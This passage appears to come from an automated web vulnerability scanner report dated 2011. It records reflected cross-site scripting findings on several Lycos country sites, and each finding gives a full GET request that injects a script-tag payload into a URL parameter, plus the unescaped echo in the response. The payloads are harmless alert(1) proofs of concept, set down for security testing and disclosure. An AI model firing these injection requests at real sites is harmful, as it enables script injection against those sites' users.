<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="de"> <head> <title>Lycos</ ...[SNIP]... <a href="/?utm_source=lycoshomedeeee"><script>alert(1)</script>625b54b2a96&utm_campaign=home_flags&utm_medium=footer&diktfc=89DDB50B9A120085A61065372DC3E57B77F4B83615A2&mobile=1"> ...[SNIP]...
1.367. http://www.lycos.dk/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.lycos.dk
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71bc4"><script>alert(1)</script>59c97228667 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?71bc4"><script>alert(1)</script>59c97228667=1 HTTP/1.1 Host: www.lycos.dk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R3977165758; path=/ Date: Mon, 07 Feb 2011 14:52:54 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:54 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 14282
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="da"> <head> <title>Lycos</ ...[SNIP]... <a href="/?71bc4"><script>alert(1)</script>59c97228667=1&diktfc=5A0E75ADBA843EA6AF248B522361920372EE4FCF7CBA&mobile=1"> ...[SNIP]...
The value of the utm_campaign request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e019"><script>alert(1)</script>7e0205ab3b9 was submitted in the utm_campaign parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?utm_source=lycoshome&utm_campaign=home_flags8e019"><script>alert(1)</script>7e0205ab3b9&utm_medium=footer HTTP/1.1 Host: www.lycos.dk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R3839802733; path=/ Date: Mon, 07 Feb 2011 14:52:58 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:58 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 14410
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="da"> <head> <title>Lycos</ ...[SNIP]... <a href="/?utm_source=lycoshome&utm_campaign=home_flags8e019"><script>alert(1)</script>7e0205ab3b9&utm_medium=footer&diktfc=75D9318A0280637377109B892BD02A3015A74C523537&mobile=1"> ...[SNIP]...
The value of the utm_medium request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28b43"><script>alert(1)</script>c81dedd1af4 was submitted in the utm_medium parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?utm_source=lycoshome&utm_campaign=home_flags&utm_medium=footer28b43"><script>alert(1)</script>c81dedd1af4 HTTP/1.1 Host: www.lycos.dk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R3839802733; path=/ Date: Mon, 07 Feb 2011 14:52:59 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:59 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 14410
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="da"> <head> <title>Lycos</ ...[SNIP]... <a href="/?utm_source=lycoshome&utm_campaign=home_flags&utm_medium=footer28b43"><script>alert(1)</script>c81dedd1af4&diktfc=966D51B79C22CECC81BE57CB55AA1A20B19A8217648B&mobile=1"> ...[SNIP]...
The value of the utm_source request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8c53"><script>alert(1)</script>5b19938f660 was submitted in the utm_source parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?utm_source=lycoshomec8c53"><script>alert(1)</script>5b19938f660&utm_campaign=home_flags&utm_medium=footer HTTP/1.1 Host: www.lycos.dk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R1161725775; path=/ Date: Mon, 07 Feb 2011 14:52:57 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:57 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 14410
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="da"> <head> <title>Lycos</ ...[SNIP]... <a href="/?utm_source=lycoshomec8c53"><script>alert(1)</script>5b19938f660&utm_campaign=home_flags&utm_medium=footer&diktfc=477D8B0129846244D200ACE977B4F602000552F59B8F&mobile=1"> ...[SNIP]...
1.371. http://www.lycos.es/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.lycos.es
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c51e"><script>alert(1)</script>856bbfbe59 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?3c51e"><script>alert(1)</script>856bbfbe59=1 HTTP/1.1 Host: www.lycos.es Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R3977165758; path=/ Date: Mon, 07 Feb 2011 14:52:54 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:54 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 14261
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="es"> <head> <title>Lycos</ ...[SNIP]... <a href="/?3c51e"><script>alert(1)</script>856bbfbe59=1&diktfc=357F29F766302431665FB2F0367D64D5DCC537A71A87&mobile=1"> ...[SNIP]...
The value of the utm_campaign request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69885"><script>alert(1)</script>51cc4754473 was submitted in the utm_campaign parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?utm_source=lycoshome&utm_campaign=home_flags69885"><script>alert(1)</script>51cc4754473&utm_medium=footer HTTP/1.1 Host: www.lycos.es Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R3839808178; path=/ Date: Mon, 07 Feb 2011 14:52:58 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:58 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 14391
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="es"> <head> <title>Lycos</ ...[SNIP]... <a href="/?utm_source=lycoshome&utm_campaign=home_flags69885"><script>alert(1)</script>51cc4754473&utm_medium=footer&diktfc=C5B8580F8943FAA0307C50326DAA719289420F1EC566&mobile=1"> ...[SNIP]...
The value of the utm_medium request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1d8d"><script>alert(1)</script>44a52bb328f was submitted in the utm_medium parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?utm_source=lycoshome&utm_campaign=home_flags&utm_medium=footera1d8d"><script>alert(1)</script>44a52bb328f HTTP/1.1 Host: www.lycos.es Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R1161727953; path=/ Date: Mon, 07 Feb 2011 14:53:00 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:53:00 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 14391
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="es"> <head> <title>Lycos</ ...[SNIP]... <a href="/?utm_source=lycoshome&utm_campaign=home_flags&utm_medium=footera1d8d"><script>alert(1)</script>44a52bb328f&diktfc=6EA8A6BFD3511A4E62C6186031E778954C0711EB9B3B&mobile=1"> ...[SNIP]...
The value of the utm_source request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26958"><script>alert(1)</script>c9c4f855d09 was submitted in the utm_source parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?utm_source=lycoshome26958"><script>alert(1)</script>c9c4f855d09&utm_campaign=home_flags&utm_medium=footer HTTP/1.1 Host: www.lycos.es Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R1161731220; path=/ Date: Mon, 07 Feb 2011 14:52:57 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:57 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 14391
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="es"> <head> <title>Lycos</ ...[SNIP]... <a href="/?utm_source=lycoshome26958"><script>alert(1)</script>c9c4f855d09&utm_campaign=home_flags&utm_medium=footer&diktfc=51176F666F0CE4EB94E92FFEAF16703B77346F6A4C4C&mobile=1"> ...[SNIP]...
1.375. http://www.lycos.fi/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.lycos.fi
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be994"><script>alert(1)</script>020268a9bd8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?be994"><script>alert(1)</script>020268a9bd8=1 HTTP/1.1 Host: www.lycos.fi Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R3839839759; path=/ Date: Mon, 07 Feb 2011 14:52:54 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:54 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 14850
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="fi"> <head> <title>Lycos</ ...[SNIP]... <a href="/?be994"><script>alert(1)</script>020268a9bd8=1&diktfc=18D2CA77617765EAAF23F54EDF888E583D663293856E&mobile=1"> ...[SNIP]...
The value of the utm_campaign request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4916d"><script>alert(1)</script>4d162d9c910 was submitted in the utm_campaign parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?utm_source=lycoshome&utm_campaign=home_flags4916d"><script>alert(1)</script>4d162d9c910&utm_medium=footer HTTP/1.1 Host: www.lycos.fi Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R1161727953; path=/ Date: Mon, 07 Feb 2011 14:53:08 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:53:08 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 15182
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="fi"> <head> <title>Lycos</ ...[SNIP]... <a href="/?utm_source=lycoshome&utm_campaign=home_flags4916d"><script>alert(1)</script>4d162d9c910&utm_medium=footer&diktfc=FBC14D92645BF05268618A64B0299D1CBE8EF6AB67D7&mobile=1"> ...[SNIP]...
The value of the utm_medium request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf40f"><script>alert(1)</script>d785a56263e was submitted in the utm_medium parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?utm_source=lycoshome&utm_campaign=home_flags&utm_medium=footercf40f"><script>alert(1)</script>d785a56263e HTTP/1.1 Host: www.lycos.fi Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R3839841937; path=/ Date: Mon, 07 Feb 2011 14:53:13 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:53:14 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 15182
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="fi"> <head> <title>Lycos</ ...[SNIP]... <a href="/?utm_source=lycoshome&utm_campaign=home_flags&utm_medium=footercf40f"><script>alert(1)</script>d785a56263e&diktfc=3F1B441190FA49364CF9EC3B96934C1FCA4A1772D606&mobile=1"> ...[SNIP]...
The value of the utm_source request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c507a"><script>alert(1)</script>eb6cd82bba9 was submitted in the utm_source parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?utm_source=lycoshomec507a"><script>alert(1)</script>eb6cd82bba9&utm_campaign=home_flags&utm_medium=footer HTTP/1.1 Host: www.lycos.fi Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R1161725775; path=/ Date: Mon, 07 Feb 2011 14:53:00 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:53:00 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 15182
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="fi"> <head> <title>Lycos</ ...[SNIP]... <a href="/?utm_source=lycoshomec507a"><script>alert(1)</script>eb6cd82bba9&utm_campaign=home_flags&utm_medium=footer&diktfc=02889CAE65AD0F7D5318F325CAE6FAACC0D37D1DFE0E&mobile=1"> ...[SNIP]...
1.379. http://www.lycos.fr/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.lycos.fr
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8822"><script>alert(1)</script>d626f42fb8f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?c8822"><script>alert(1)</script>d626f42fb8f=1 HTTP/1.1 Host: www.lycos.fr Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R1161725775; path=/ Date: Mon, 07 Feb 2011 14:52:54 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:54 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 14471
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="fr"> <head> <title>Lycos</ ...[SNIP]... <a href="/?c8822"><script>alert(1)</script>d626f42fb8f=1&diktfc=05D5FB0B14E56DA4F8E29B53EB91732C171C3E75A898&mobile=1"> ...[SNIP]...
The value of the utm_campaign request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f4df"><script>alert(1)</script>64321ccecd0 was submitted in the utm_campaign parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?utm_source=lycoshome&utm_campaign=home_flags2f4df"><script>alert(1)</script>64321ccecd0&utm_medium=footer HTTP/1.1 Host: www.lycos.fr Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R3839840848; path=/ Date: Mon, 07 Feb 2011 14:52:58 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:58 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 14599
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="fr"> <head> <title>Lycos</ ...[SNIP]... <a href="/?utm_source=lycoshome&utm_campaign=home_flags2f4df"><script>alert(1)</script>64321ccecd0&utm_medium=footer&diktfc=9B828BD6EDE5456001BEA95EF6DCB9FCF206CC47FAF6&mobile=1"> ...[SNIP]...
The value of the utm_medium request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51028"><script>alert(1)</script>71dd1d1469d was submitted in the utm_medium parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?utm_source=lycoshome&utm_campaign=home_flags&utm_medium=footer51028"><script>alert(1)</script>71dd1d1469d HTTP/1.1 Host: www.lycos.fr Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R1161730131; path=/ Date: Mon, 07 Feb 2011 14:53:00 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:53:00 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 14599
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="fr"> <head> <title>Lycos</ ...[SNIP]... <a href="/?utm_source=lycoshome&utm_campaign=home_flags&utm_medium=footer51028"><script>alert(1)</script>71dd1d1469d&diktfc=158466BC48E4AA1D23425CDA98570C0C3B0695586155&mobile=1"> ...[SNIP]...
The value of the utm_source request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aaa31"><script>alert(1)</script>477aefb8b8d was submitted in the utm_source parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?utm_source=lycoshomeaaa31"><script>alert(1)</script>477aefb8b8d&utm_campaign=home_flags&utm_medium=footer HTTP/1.1 Host: www.lycos.fr Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R3839838670; path=/ Date: Mon, 07 Feb 2011 14:52:57 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:57 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 14599
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="fr"> <head> <title>Lycos</ ...[SNIP]... <a href="/?utm_source=lycoshomeaaa31"><script>alert(1)</script>477aefb8b8d&utm_campaign=home_flags&utm_medium=footer&diktfc=15CD519B273D997182E999949C497142DDE7EEC9019C&mobile=1"> ...[SNIP]...
1.383. http://www.lycos.in/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.lycos.in
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 880d7"><script>alert(1)</script>2964dca0fa7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?880d7"><script>alert(1)</script>2964dca0fa7=1 HTTP/1.1 Host: www.lycos.in Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R1161730131; path=/ Date: Mon, 07 Feb 2011 14:52:54 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:54 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 14168
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos</title><met ...[SNIP]... <a href="/?880d7"><script>alert(1)</script>2964dca0fa7=1&diktfc=21EC543477F0A26237B678C96D627AF197E5A3158E95&mobile=1"> ...[SNIP]...
